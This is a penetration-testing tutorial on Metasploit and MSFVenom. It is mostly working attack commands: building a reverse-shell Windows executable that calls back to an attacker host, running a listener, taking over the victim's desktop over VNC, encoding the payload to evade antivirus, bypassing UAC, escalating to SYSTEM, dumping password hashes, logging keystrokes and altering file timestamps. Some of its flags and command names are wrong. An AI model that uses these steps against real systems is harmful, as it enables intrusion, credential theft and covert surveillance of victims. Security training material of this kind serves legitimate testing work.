MSFVenom is a tool used to create malicious payloads for the Metasploit framework. The Metasploit framework is a tool for developing and executing remote exploits on a vulnerable target. Tools within the framework allow you to complete various stages of a penetration test.
Establishing a VNC Session
MSFVenom can be used to create lots of different types of payload. One of these can be used to establish a VNC session on a remote host. Virtual Network Computing (VNC) is a system that allows remote graphical connections to a host, this allows you to use the device remotely as though you were sitting in front of it. There are a number of VNC variants offering different features. Establishing a malicious VNC session on a target machine gives you a good foothold in a target network.
Generating a payload is simple enough:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<attackerIP> LPORT=<myPort> -o /root/Desktop/evil.exe
- -p - Specifies the payload we'd like to use. There are a large number of payloads to choose from.
- --platform - This is where you choose the platform the payload is for. Use the man page to discover the available payloads.
- -a - Architecture the exploit will run on.
- -f - The format of the output file
- LHOST - For this exploit this is how you specify the IP address of the listening machine
- LPORT - Similar to the above this is how you specify the port the listener will listen on.
- -o - The name and location of the output file.
This will generate an exe file that can run on Windows.
We'll now start the listener on our attacker machine.
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attackerIP>
set LPORT <myPort>
The listener is now setup.
During a normal penetration test you would have to find a way to get the file onto a target machine, this is the tricky part but I won't be telling you how to do it.
Once the user runs your exe file the system will be compromised. You'll see that the listener opens a meterpreter session and displays the IP and port of the listener and the victim.
Now we can use the established connection to tamper with the victim machine.
session -i 1
run vnc
- session -i 1 - This ensures we are using session 1.
- sysinfo - Displays basic information about the system the session is open on.
- run vnc - Opens up a VNC session on the infected machine. Once this command is run you will see a screen appear showing the user's desktop.
N.B The exploit that we have created using MSFVenom will likely be caught by most standard antivirus tools. The are methods to reduce the chance of detection, but I won't go into detail for this section.
Escalating Privileges
Escalating privilege is an essential part of any penetration test. This allows you to compromise a normal user account and then increase your level of privilege, enabling you to perform further actions on your victim's network/device.
To generate the exploit generate our payload we'll use the following command:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" -f exe LHOST=<attackerIP> -f Desktop/escalation.exe
This is similar to the command we used to create the previous payload with a few key differences.
- -e - Sets the encoding on the output file. This can help to avoid detection by antivirus, however, a lot of scanners will still detect this.
- -b - You can provide a list of characters to avoid.
- -f - Where you're outputting the file.
Start the listener on our attacker machine.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attackerIP>
set LPORT <myPort>
exploit -j -z
Again you'll have to figure out how to get this onto the target machine. Once the target has run the exe you'll have a session established with the target. Make the session interactive and grab the current user's username.
session -i 1
Depending on the user's privilege level you won't be able to perform administrator type actions. We now want to escalate our privileges so that we 'own' the system.
use exploit/windows/local/bypassuac_fodhelper
- background - Sends the current session to the background so you can perform the next tasks.
- use exploit/windows/local/bypassuac_fodhelper - Sets the exploit you want to use.
- set SESSION 1 - Sets the SESSION variable for the exploit. N.B. Different exploits use different variables, to see the available options and a description use the
show options
set payload windows/meterpreter/reverse_tcp
set LHOST <attackerIP>
set LPORT <myPort>
set TARGET 0
You should now have a new meterpreter session open.
getsystem -t 1
This should have escalated your privileges to the 'SYSTEM' account. If you use getuid
you should see the username is now SYSTEM.
We can now dump the password hashes of users on the system as well as password hints.
run post/windows/gather/smart_hashdump
If this command works then you have successfully escalated you privilege. Well done!
####Post Exploitation Activities So you've compromised a device and escalated your privileges, now what?
Well you can do any number of things. I'll show you some of the things you might want to do.
- ls - Lists the current directory contents.
- cd - Change directory.
- pwd - Prints the current directory.
- timestomp secret.txt -v Alters the Modified, Access, Created, Entry Modified (MACE) attributes.
- download myFile.doc - Downloads the specified document to your machine.
- search -f "myFile.doc" - Searches for files on the system. You can search in specific folders or the whole system.
- keyscan_start - Initiates key capturing on the victim.
- keyscan_dump - Dumps the keystrokes to the terminal
- idletime - Displays the time, in seconds, the system has been idle.
- shutdown - Shutdowns the victim's machine.